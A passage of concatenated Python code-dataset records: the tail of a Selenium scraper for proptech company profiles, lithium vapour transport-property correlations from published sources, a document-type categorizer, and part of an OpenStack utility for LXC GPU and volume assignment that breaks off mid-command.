driver.find_elements_by_css_selector(\".results-container .company-box a\")\n for company_link in company_elems:\n company = company_link.get_attribute(\"href\")\n companies.append(company)\n return companies\n\n\n# load each company's profile\ndef open_company_profile(unissu_url):\n driver.get(unissu_url)\n driver.find_element_by_css_selector(\".company-info\")\n\n\n# get company's name\ndef get_company_name():\n name_elem = driver.find_element_by_css_selector(\".company-name\")\n driver.execute_script(\"arguments[0].scrollIntoView(true);\", name_elem)\n time.sleep(1)\n return name_elem.text\n\n\n# get company's tags\n# accounting for the possibility of multiple tags or no tags\ndef get_company_tags():\n tags = ''\n try:\n more_tag = driver.find_element_by_css_selector(\".tags-row span[class*='green-tag']\")\n more_tag.click()\n time.sleep(1)\n except NoSuchElementException:\n pass\n\n tag_elems = driver.find_elements_by_css_selector(\".tags-row span\")\n if len(tag_elems) != 0:\n for tag in tag_elems[:-1]:\n tags += tag.text + \", \"\n if tag_elems[-1].text != 'Show Less':\n tags += tag_elems[-1].text\n else:\n tags = tags[:-2]\n return tags\n\n\n# get company's description\ndef get_company_description():\n return driver.find_element_by_css_selector(\".description\").text\n\n\n# get company's website\ndef get_company_website():\n return driver.find_element_by_css_selector(\"div[class*='websiteLink'] a\").get_attribute(\"href\")\n\n\n# get company's linkedin \n# accounting for the possibility of company not having linkedin profile\ndef get_company_linkedin():\n linkedin = '-'\n try:\n linkedin_link = driver.find_element_by_xpath(\"//img[@alt='linkedin']/parent::a\")\n linkedin = linkedin_link.get_attribute(\"href\")\n except NoSuchElementException:\n pass\n return linkedin\n\n\n# go to each company's unissu profile\n# get name, tags, description, website, and linkedin\ndef get_companies_information():\n companies = get_companies_links()\n\n # create dataframe object to write to excel\n keys = [\"Name\", \"Unissu URL\", \"Tags\", \"Description\", \"Website\", \"Linkedin\"]\n data = dict.fromkeys(keys, [])\n dataframe = pandas.DataFrame(data)\n dataframe.to_excel(\"companies.xlsx\", index = False, engine = \"xlsxwriter\")\n\n # get company's information from company's profile\n for company in companies:\n unissu_url = company\n open_company_profile(unissu_url)\n\n tags = get_company_tags()\n name = get_company_name()\n description = get_company_description()\n website = get_company_website()\n linkedin = get_company_linkedin()\n\n # store all info into company's profile\n company_data = dict.fromkeys(keys, '')\n company_data[\"Name\"] = name\n company_data[\"Unissu URL\"] = unissu_url\n company_data[\"Tags\"] = tags\n company_data[\"Description\"] = description\n company_data[\"Website\"] = website\n company_data[\"Linkedin\"] = linkedin\n\n # write to excel\n dataframe = dataframe.append(company_data, ignore_index = True)\n dataframe.to_excel(\"companies.xlsx\", index = False, engine = \"xlsxwriter\")\n\n\nif __name__ == \"__main__\":\n open_main_page()\n close_popup()\n load_companies()\n get_companies_information()\n driver.close()\n\n","sub_path":"proptech.py","file_name":"proptech.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587771643","text":"import numpy as np\nfrom numpy import sqrt, log, exp, pi\nfrom scipy.interpolate import interp1d\nfrom lithdata.vaporpressure import press_best\n\ndef eta1_Vargaftik_and_Yargin(TK):\n \"\"\"\n Viscosity of the monomers as a function of temperature.\n \n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n Equation (56), page 821.\"\"\"\n eta1 = 1e-7 * (130.6 + 0.1014 * (TK - 1000) - 4.55e-6 * (TK - 1000)**2)\n return eta1\n\ndef eta1_Vargaftik_and_Yargin_error(TK):\n \"\"\"\n \"Errors in the viscosity and thermal conductivity factors for \n the lithium vapour atomic component, due to inaccuracy in \n calculating atom collision integrals, are equal on average \n to 3%, falling from 3.8% to 1.5% with increase of the temperature\n from 700 to 2500 K. The portion of the error which is determined \n by inaccuracy in establishing the value of $\\beta^2_{12}$ is \n changed with the concentration of the molecular component, reaching \n its maximum at the saturation line. In the case of viscosity it is \n 1 - 6 %, and for thermal conductivity it is 4 - 8 % (for T <= 2000 K)\"\n \"\"\"\n x1, y1 = (700, 3.8)\n x2, y2 = (2500, 1.5)\n return y1 + (y2 - y1) * (TK - x1)/(x2 - x1)\n\ndef eta_Vargaftik_and_Yargin(x2, TK):\n \"\"\"Viscosity with two components, monomer and dimer.\n Equation (55), page 821.\n $$ \\eta(x_2, T) = \\eta_1(T) \\left(1 - 3.65 x_2 \n + 12.5 x_2^2 - 42 x_2^3 \n + 142 x_2^4 - 479 x_2^5 \n + 1600 x_2^6\\right)$$\n \"\"\"\n eta1 = eta1_Vargaftik_and_Yargin(TK)\n eta = eta1 * (1 - 3.65 * x2 + 12.5 * x2**2\n - 42 * x2**3 + 142 * x2**4 \n - 479 * x2**5 + 1600 * x2**6)\n return eta\n\ndef eta_sat_Vargaftik_and_Yargin_Table():\n \"\"\"\n Table 36\n \"\"\"\n t = [700, 725, 750, 775, 800, 825, 850, 875, 900, 925, 950, 975,\n 1000, 1025, 1050, 1075, 1100, 1125, 1150, 1175, 1200,\n 1225, 1250, 1275, 1300, 1325, 1350, 1375, 1400, 1425,\n 1450, 1475, 1500, 1525, 1550, 1575, 1600, 1625, 1650,\n 1675, 1700, 1725, 1750, 1775, 1800, 1825, 1850, 1875,\n 1900, 1925, 1950, 1975, 2000]\n eta_sats = np.array([98.6, 100.9, 103.0, 105.0, 107.0, 108.9,\n 110.6, 112.3, 113.8, 115.3, 116.6, 117.8, 119.0,\n 120.0, 121.0, 121.9, 122.7, 123.4, 124.1, 124.7,\n 125.3, 125.8, 126.2, 126.7, 127.1, 127.4, 127.8,\n 128.1, 128.4, 128.7, 129.0, 129.3, 129.6, 129.9, \n 130.2, 130.5, 130.7, 131.0, 131.3, 131.7, 132.0,\n 132.3, 132.6, 133.0, 133.3, 133.7, 134.1, 134.4,\n 134.8, 135.2, 135.6, 136.0, 136.4])\n data = np.array([t, 1.0e-7 * eta_sats]).T\n return data\n\ndef x2_concentration_Vargaftik_and_Yargin(P_kpa, Keq):\n \"\"\"Equation (80)\n \"\"\"\n x2 = 1 - 2/(1 + sqrt(1 + 3.9477e-2 * P_kpa / Keq))\n return x2\n\ndef phi_V_and_Y(component, T):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n $\\phi^*$ from the coefficients in Table 35, page 823.\n \"\"\"\n x = 1e-4 * T \n # functions = [1, log(x), 10^-4 x^-2, 10^-2 x^-1, x, x^2, x^3]\n table = [[187.7374, 19.5189, 4.7730, -6.117, 10.9728, -21.055, 21.357],\n [284.3545, 35.8511, -7.180, 17.819, 35.8331, -73.097, 46.625]]\n t = table[component - 1]\n phi = (t[0] + t[1] * log(x) \n + t[2] * 1e-4 * x**(-2)\n + t[3] * 1e-2 * x**(-1)\n + t[4] * x\n + t[5] * x**2\n + t[6] * x**3)\n return phi\n\ndef K_eq_Vargaftik_and_Yargin(T_gas, d_0_0=107800):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n $\\phi^*$ from the coefficients in Table 35, page 823.\n \"\"\"\n R_gas = 8.31446\n phi1 = phi_V_and_Y(1, T_gas)\n phi2 = phi_V_and_Y(2, T_gas)\n K_eq = exp((2 * phi1 - phi2)/R_gas - d_0_0 / (R_gas * T_gas))\n return K_eq\n\n# Vargaftik and Voljak table\ndef x2_concentration_Vargaftik_and_Voljak(TK):\n data_T = [800, 850, 900, 1000, 1100, 1200, 1500, 1800, 2000]\n data_x2 = [0.007953, 0.01134, 0.0155, 0.02596, 0.03894, 0.05383, 0.1035, 0.1505, 0.1767]\n interp = interp1d(data_T, data_x2, kind='cubic', bounds_error=False)\n x_2 = interp(TK)\n return x_2\n\ndef eta1_Vargaftik_1991_Eq_6(TK):\n \"\"\"Linear fit to monomer viscosity\n \n Equation (6) of\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n \"\"\"\n return (129.1 + 0.100 * (TK - 1000)) * 1e-7\n\ndef eta_Vargaftik_1991_Eq_4(x2, TK):\n \"\"\"\n Viscosity as a function of x2 and temperature\n\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n \"\"\"\n b1, b2, b3, b4 = 4.094, 3.335, 0.864, -6.964e-2\n numerator = 1 + b3 * x2 + b4 * x2**2\n denominator = 1 + b1 * x2 + b2 * x2**2\n eta = eta1_Vargaftik_1991_Eq_6(TK) * numerator / denominator\n return eta\n\ndef extrapolation_of_V_91_low_pressure(TK):\n Keq = K_eq_Vargaftik_and_Yargin(TK)\n P_kpa = press_best(TK) / 1000\n x2 = x2_concentration_Vargaftik_and_Yargin(P_kpa, Keq)\n eta_sat = eta_Vargaftik_1991_Eq_4(x2, TK)\n return eta_sat\n\ndef eta1_Vargaftik_1991_Table(TK):\n \"\"\"\n Monomer viscosity\n\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Table IV\n\n Uncertainties: on the experiments:\n \"Average error for the value thus obtained is estimated to be 5 %.\"\n \"\"\"\n data_T = np.arange(800,2600,100) # 800 to 2500\n data_eta1 = np.array([100, 112, 123, 134, 145, 155,\n 166, 176, 186, 196, 205, 215,\n 224, 233, 242, 250, 260, 268])\n interp = interp1d(data_T, data_eta1, kind='cubic', bounds_error=False)\n eta1 = 1e-7 * interp(TK)\n return eta1\n\ndef eta_sat_Vargaftik_1991_Table(TK):\n \"\"\"\n Saturated viscosity\n\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Table IV\n\n Uncertainties: on the experiments:\n \"Average error for the value thus obtained is estimated to be 5 %.\"\n \"\"\"\n data_T = np.arange(800,2600,100) # 800 to 2500\n data_eta_sat = np.array([97.2, 106, 113, 118, 123,\n 126, 129, 131, 133, 135, 137, 139,\n 140, 141, 143, 144, 146, 147])\n interp = interp1d(data_T, data_eta_sat, kind='cubic', bounds_error=False)\n eta_sat = 1e-7 * interp(TK)\n return eta_sat\n\n\n# Bouledroua et al, 2005 Phys. Scr. 71 519\ndef eta1_Bouledroua(TK):\n \"\"\"\n Viscosity of the monomers as a function of temperature.\n\n Bouledroua, M, A Dalgarno, and R Côté.\n “Viscosity and Thermal Conductivity of Li, Na, and K Gases.”\n Physica Scripta 71, no. 5 (January 1, 2005): 519–22. \n https://doi.org/10.1238/Physica.Regular.071a00519.\n \n \"The numerical values in the Tables\n can be reproduced by the simple formula\n $$ \\eta = A T^{\\alpha}, \\quad A = 0.234, \\quad \\alpha = 0.903$$\"\n\n \"\"\"\n A = 0.234\n alpha = 0.903\n eta1 = 1e-7 * A * TK**alpha\n return eta1\n\ndef eta1_Bouledroua_Table_I(TK):\n \"\"\"\n Parameters:\n TK, temperature in Kelvin. 200 < TK < 2000.\n\n Viscosity of the monomers as a function of temperature.\n\n Bouledroua, M, A Dalgarno, and R Côté.\n “Viscosity and Thermal Conductivity of Li, Na, and K Gases.”\n Physica Scripta 71, no. 5 (January 1, 2005): 519–22. \n https://doi.org/10.1238/Physica.Regular.071a00519.\n\n Data from Tables I and IV. Eta in micropoise.\n \"\"\"\n data_T = [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]\n data_eta1 = [23, 49, 75, 100, 123, 144, 164, 184, 202, 221]\n \n interp = interp1d(data_T, data_eta1, kind='cubic', bounds_error=False)\n eta1 = 1e-7 * interp(TK)\n return eta1\n\n# Stepanenko et al, Experimental $\\eta$ at high temperatures, 1986\ndef eta_Stepanenko(X2, T):\n \"\"\"\n Stepanenko, I. F., N. I. Sidorov, Y. V. Tarlakov, and V. S. Yargin.\n “Experimental Study of the Viscosity of \n Lithium Vapor at High Temperatures.” \n International Journal of Thermophysics 7, no. 4 (July 1986): 829–35.\n https://doi.org/10.1007/BF00503840.\n\n Equation (5).\n\n (the abstract suggests:) Valid for 1600 < T < 2000 K\n\n \"Based on the analysis of the experimental errors, the accuracy of the\n data obtained has been estimated to be 3-4%.\"\n \"\"\"\n eta = 1e-7 * (178 - 530 * (X2 - 0.05) +0.071 * (T - 1700))\n eta_filtered = np.where(T >= 1500., eta, np.nan)\n return eta_filtered\n\ndef eta_Stepanenko_Table():\n \"\"\"\n These tables are points at various pressures, probably not saturated.\n\n Stepanenko, I. F., N. I. Sidorov, Y. V. Tarlakov, and V. S. Yargin.\n “Experimental Study of the Viscosity of \n Lithium Vapor at High Temperatures.” \n International Journal of Thermophysics 7, no. 4 (July 1986): 829–35.\n https://doi.org/10.1007/BF00503840.\n\n Data from Table I.\n \"\"\"\n data = np.array([[1595, 163],\n [1607, 143],\n [1668, 187],\n [1692, 174],\n [1700, 183],\n [1715, 165],\n [1722, 160],\n [1747, 195],\n [1812, 184],\n [1815, 193],\n [1823, 193],\n [1852, 186],\n [1970, 210],\n [1983, 208]], dtype='float')\n data[:,1] = 1e-7 * data[:,1]\n return data\n\ndef eta1_Fialho_1993_Table(TK):\n data_T = np.arange(700,2100,100)\n data_eta1 = np.array([8.56,\n 9.71,\n 10.82,\n 11.89,\n 12.93,\n 13.93,\n 14.91,\n 15.86,\n 16.80,\n 17.72,\n 18.63,\n 19.53,\n 20.41,\n 21.30])\n interp = interp1d(data_T, data_eta1, kind='cubic', bounds_error=False)\n eta1 = 1e-6 * interp(TK)\n return eta1\n\n#### Thermal conductivity data\ndef lambda1_Vargaftik_and_Yargin(TK):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n Equation 66, page 822.\n Valid 700 K < T < 2500 K\n \n Uncertainties: \"for lithium vapour, ± 3 % for monatomic gas, and ± 7 % at the saturation line\"\n \"\"\"\n lambda1 = 1e-4 * (587.7 + 0.4562 * (TK - 1000) - 20.5e-6 * (TK - 1000)**2)\n return lambda1\n\ndef lambda_Vargaftik_and_Yargin(x2, TK):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n Equations 65 and 67, page 822.\n Valid 700 K < T < 2500 K\n\n Uncertainties: \"for lithium vapour, ± 3 % for monatomic gas, and ± 7 % at the saturation line\"\n \"\"\"\n T_r = 13583 + 0.297 * (TK - 1000) + 43e-6 * (TK - 1000)**2\n lambda1 = lambda1_Vargaftik_and_Yargin(TK)\n lambda_total = lambda1 * (1 - 3.84 * x2**1 + 13.6 * x2**2\n - 48 * x2**3 + 166 * x2**4\n - 576 * x2**5 + 1994 * x2**6 \n + 0.095 * (T_r / TK)**2 * (x2 * (1 - x2))/((1 + x2)**2)\n )\n return lambda_total\n\ndef lambda_sat_Vargaftik_and_Yargin_Table(TK):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n Page 828, Table 37.\n\n Uncertainties: \"for lithium vapour, [...] ± 7 % at the saturation line\"\n \"\"\"\n data_T = np.arange(700,2025,25)\n data_lambda_sats = np.array([497.2, 519.0, 541.6, 565.1, 589.2,\n 613.9, 638.8, 664.0, 689.2, 714.3, 739.2, 763.6, 787.4,\n 810.6, 833.1, 854.6, 875.3, 895.0, 913.6, 931.2, 947.8,\n 963.3, 977.7, 991.0, \n 1003.4, 1014.8, 1025.2, 1034.6, 1043.3, 1051.0,\n 1058.0, 1064.3, 1069.9, 1074.8, 1079.1, 1082.9,\n 1086.1, 1088.9, 1091.2, 1093.2, 1094.8, 1096.0,\n 1097.0, 1097.7, 1098.1, 1098.3, 1098.3, 1098.2,\n 1097.8, 1097.3, 1096.7, 1096.0, 1095.1])\n interp = interp1d(data_T, data_lambda_sats, kind='cubic', bounds_error=False)\n lambda_sat = 1e-4 * interp(TK)\n return lambda_sat\n\ndef lambda1_Vargaftik_1991_Eq_5(TK):\n \"\"\"\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Equation (5)\n \"\"\"\n lambda1 = (541.0 + 0.485 * (TK - 1000)) * 1e-4\n return lambda1\n\ndef lambda_Vargaftik_1991_Eq_3(x2, TK):\n \"\"\"\n Thermal conductivity as a function of x2 and temperature\n\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n \"\"\"\n pass\n\n\ndef lambda1_Vargaftik_1991_Table(TK):\n \"\"\"\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Table III\n\n Uncertainties: on the experiments:\n \"Average error for the value thus obtained is estimated to be 5 %.\"\n \"\"\"\n data_T = np.arange(800,2600,100) # 800 to 2500\n data_lambda1 = np.array([450, 506, 558, 607, 655,\n 701, 745, 790, 834, 878, 921, 965, \n 1008, 1050, 1092, 1131, 1169, 1203])\n interp = interp1d(data_T, data_lambda1, kind='cubic', bounds_error=False)\n lambda1 = 1e-4 * interp(TK)\n return lambda1\n\ndef lambda_sat_Vargaftik_1991_Table(TK):\n \"\"\"\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n\n Table III.\n \"\"\"\n data_T = np.arange(800,2600,100) # 800 to 2500\n data_lambda_sat = np.array([543, 652, 753, 841, 913,\n 966, 1003, 1029, 1045, 1055, 1058, 1058, 1054,\n 1048, 1041, 1031, 1020, 1006])\n interp = interp1d(data_T, data_lambda_sat, kind='cubic', \n bounds_error=False)\n lambda_sat = 1e-4 * interp(TK)\n return lambda_sat\n\n\ndef lambda1_Bouledroua_Table(TK):\n \"\"\"\n Parameters:\n TK, temperature in Kelvin. 200 < TK < 2000.\n\n Coefficients of thermal conductivity of the monomers.\n\n Bouledroua, M, A Dalgarno, and R Côté.\n “Viscosity and Thermal Conductivity of Li, Na, and K Gases.”\n Physica Scripta 71, no. 5 (January 1, 2005): 519–22. \n https://doi.org/10.1238/Physica.Regular.071a00519.\n\n Data from Table V. Lambda in the table is 10^{-3} W/mK.\n \"\"\"\n data = [[ 200, 10.31],\n [ 400, 21.97],\n [ 600, 33.63],\n [ 800, 44.84],\n [1000, 55.15],\n [1200, 64.57],\n [1400, 73.54],\n [1600, 82.51],\n [1800, 90.58],\n [2000, 99.10]]\n data = np.array(data)\n interp = interp1d(data[:,0], data[:,1], kind='cubic', bounds_error=False)\n lambda1 = 1e-3 * interp(TK)\n return lambda1\n\n#### Self-diffusion coefficients\ndef D11_Fialho_1993_Table(TK):\n \"\"\"\n Self-diffusion coefficient at 0.10 MPa for monoatomic lithium.\n\n Fialho, Paulo S., J.M.N.A. Fareleira, M.L.V. Ramires,\n and C.A. Nieto de Castro. \"Thermophysical Properties\n of Alkali Metal Vapours, Part I.A.\" \n Berichte Der Bunsen-Gesellschaft Fur Physikalische Chemie\n 97, no. 11 (1993): 1487–92.\n\n Uncertainties: \"The average collisions integrals \n $\\bar{\\Omega}^{(l,s)}(T)$ are compared with the results obtained \n previously [1] in Fig 2. The agreement is very good for lithium,\n where the maximum deviation is less than ±1%.\"\n\n Data from Table 3.\n \"\"\"\n D_self_Fialho_1993_table = np.array([\n [700, 0.8885],\n [800, 1.1491],\n [900, 1.4393],\n [1000, 1.7589],\n [1100, 2.1077],\n [1200, 2.4859]])\n data = D_self_Fialho_1993_table\n interp = interp1d(data[:,0], data[:,1], kind='cubic', bounds_error=False)\n return 1e-4 * interp(TK)\n","sub_path":"lithdata/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":18677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594499542","text":"import os, collections\nfrom FileTypeSimpleCategorizer import FileTypeSimpleCategorizer\n\nclass FileTypeDocument(FileTypeSimpleCategorizer):\n @property \n def type_id(self):\n return 'Documents'\n\n def __init__(self):\n extensions = [\".txt\", \".rtf\", \".doc\", \".xdoc\", \".xls\", \".pdf\", \".xlsx\", \".docx\"]\n metadata = collections.OrderedDict()\n metadata['Category'] = ''\n metadata['Subcategory'] = ''\n metadata['Sub-subcategory'] = ''\n FileTypeSimpleCategorizer.__init__(self, extensions, metadata)\n \n def relative_path_from_metadata(self, metadata):\n categories = [metadata[key] for key in ['Category', \n 'Subcategory',\n 'Sub-subcategory']\n if metadata.has_key(key)]\n path_components = [category for category in categories if category != \"\"]\n if path_components == []:\n path_components = ['Unknown']\n return os.path.join(*path_components)\n","sub_path":"src/libentr/FileTypeDocument.py","file_name":"FileTypeDocument.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"462757650","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (c) 2011 University of Southern California\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\"\"\"\nUtility functions\n to allow GPUs to be seen inside of LXC instance.\n to manage allocation/deallocation of gpu devices to/from VM\n\n**Related Flags**\n\n:instance_type_extra_specs:\n:dev_cgroups_path:full path of cgroup device of LXC\n:gpu_dev_major_number: major number of gpu device\n:gpu_dev_minor_number: start of the minor numbers of gpu device\n\n\"\"\"\nimport os\nimport subprocess\n\nfrom nova.compute import vm_states\nfrom nova import context as nova_context\nfrom nova import db\nfrom nova import exception\nfrom nova import flags\nfrom nova.openstack.common import cfg\nfrom nova.openstack.common import log as logging\nfrom nova import utils\n\n# Variables for tracking gpus available and gpus assigned\ngpus_available = []\ngpus_assigned = {}\nnum_gpus = None\nextra_specs = {}\n\nLOG = logging.getLogger(__name__)\n\ngpu_opts = [\n cfg.ListOpt('instance_type_extra_specs',\n default=[],\n help='a list of additional capabilities corresponding to '\n 'instance_type_extra_specs for this compute '\n 'host to advertise. Valid entries are name=value, pairs '\n 'For example, \"key1:val1, key2:val2\"'),\n cfg.StrOpt('dev_cgroups_path',\n default='/cgroup/devices/libvirt/lxc',\n help='Path of the LXC cgroup'),\n cfg.StrOpt('gpu_dev_major_number',\n default=195,\n help='Major number of GPU devices'),\n cfg.StrOpt('gpu_dev_minor_number',\n default=0,\n help='Start numer of minor number of GPU devices'),\n ]\n\nFLAGS = flags.FLAGS\nFLAGS.register_opts(gpu_opts)\n\n\ndef init_host_gpu():\n get_instance_type_extra_specs_capabilities()\n global gpus_available\n global num_gpus\n global extra_specs\n if 'gpus' in extra_specs:\n num_gpus = extra_specs['gpus']\n gpus_available = range(int(extra_specs['gpus']))\n\n\ndef update_status(data):\n global extra_specs\n for key in extra_specs.iterkeys():\n if 'gpus' == key:\n data['gpus'] = int(len(gpus_available))\n else:\n data[key] = extra_specs[key]\n return data\n\n\ndef get_instance_type_extra_specs_capabilities():\n \"\"\"Return additional capabilities to advertise for this compute host.\"\"\"\n global extra_specs\n for pair in FLAGS.instance_type_extra_specs:\n keyval = pair.split(':', 1)\n keyval[0] = keyval[0].strip()\n keyval[1] = keyval[1].strip()\n extra_specs[keyval[0]] = keyval[1]\n return extra_specs\n\n\ndef get_gpu_total():\n return len(gpus_available)\n\ndef allow_gpus(inst):\n global num_gpus\n dev_whitelist = os.path.join(FLAGS.dev_cgroups_path,\n inst['name'],\n 'devices.allow')\n # Allow Nvidia Controller\n perm = 'c %d:255 rwm\\n' % FLAGS.gpu_dev_major_number\n _PIPE = subprocess.PIPE\n utils.execute('tee', dev_whitelist, process_input=perm,\n run_as_root=True)\n for i in range(int(num_gpus)):\n # Allow each gpu device\n perm = 'c 195:%d rwm\\n' % (i + FLAGS.gpu_dev_minor_number)\n utils.execute('tee', dev_whitelist, process_input=perm,\n run_as_root=True)\n\n\ndef assign_gpus(context, inst, lxc_container_root):\n \"\"\"Assigns gpus to a specific instance\"\"\"\n global gpus_available\n global gpus_assigned\n# ctxt = nova_context.get_admin_context()\n gpus_in_meta = 0\n gpus_in_extra = 0\n\n env_file = lxc_container_root + '/etc/environment'\n instance_extra = db.instance_type_extra_specs_get(context,\n inst['instance_type_id'])\n msg = _(\"instance_extra is %s .\") % instance_extra\n LOG.debug(msg)\n msg = _(\"vcpus for this instance are %d .\") % inst['vcpus']\n LOG.debug(msg)\n if 'gpus' in inst['metadata']:\n gpus_in_meta = int(inst['metadata']['gpus'])\n msg = _(\"gpus in metadata asked, %d .\") % gpus_in_meta\n LOG.info(msg)\n if 'gpus' in instance_extra:\n gpus_in_extra = int(instance_extra['gpus'].split()[1])\n msg = _(\"gpus in instance_extra asked, %d .\") % gpus_in_extra\n LOG.info(msg)\n\n if gpus_in_meta > gpus_in_extra:\n gpus_needed = gpus_in_meta\n else:\n gpus_needed = gpus_in_extra\n allow_gpus(inst)\n gpus_assigned_list = []\n if gpus_needed > len(gpus_available):\n raise Exception(_(\"Overcommit Error\"))\n for i in range(gpus_needed):\n gpus_assigned_list.append(gpus_available.pop())\n if gpus_needed:\n gpus_assigned[inst['name']] = gpus_assigned_list\n gpus_visible = str(gpus_assigned_list).strip('[]')\n flag = \"CUDA_VISIBLE_DEVICES=%s\\n\" % gpus_visible\n utils.execute('tee', env_file, process_input=flag,\n run_as_root=True)\n\n\ndef deassign_gpus(inst):\n \"\"\"Assigns gpus to a specific instance\"\"\"\n global gpus_available\n global gpus_assigned\n if inst['name'] in gpus_assigned:\n gpus_available.extend(gpus_assigned[inst['name']])\n del gpus_assigned[inst['name']]\n return\n\n\n'''\nThe following codes are used because the main stream's code\ndoes not work for LXC Raw image volume management.\n'''\n\n\ndef attach_volume_lxc(self, connection_info, instance_name, \\\n mountpoint, virt_dom):\n # get device path\n data = connection_info['data']\n device_path = data['device_path']\n LOG.info(_('attach_volume: device_path(%s)') % str(device_path))\n\n # get id of the virt_dom\n spid = str(virt_dom.ID())\n LOG.info(_('attach_volume: pid(%s)') % spid)\n\n # get PID of the init process\n ps_command = subprocess.Popen(\"ps -o pid --ppid %s --noheaders\" % \\\n spid, shell=True, stdout=subprocess.PIPE)\n init_pid = ps_command.stdout.read()\n init_pid = str(int(init_pid))\n retcode = ps_command.wait()\n assert retcode == 0, \"ps command returned %d\" % retcode\n\n LOG.info(_('attach_volume: init_pid(%s)') % init_pid)\n # get major, minor number of the device\n s = os.stat(device_path)\n major_num = os.major(s.st_rdev)\n minor_num = os.minor(s.st_rdev)\n LOG.info(_('attach_volume: path(%s)') % device_path)\n LOG.info(_('attach_volume: major_num(%(major_num)d) ' \\\n 'minor_num(%(minor_num)d)') % locals())\n\n # allow the device\n dev_whitelist = os.path.join(FLAGS.dev_cgroups_path,\n instance_name,\n 'devices.allow')\n # Allow the disk\n perm = \"b %d:%d rwm\" % (major_num, minor_num)\n cmd = \"echo %s | sudo tee -a 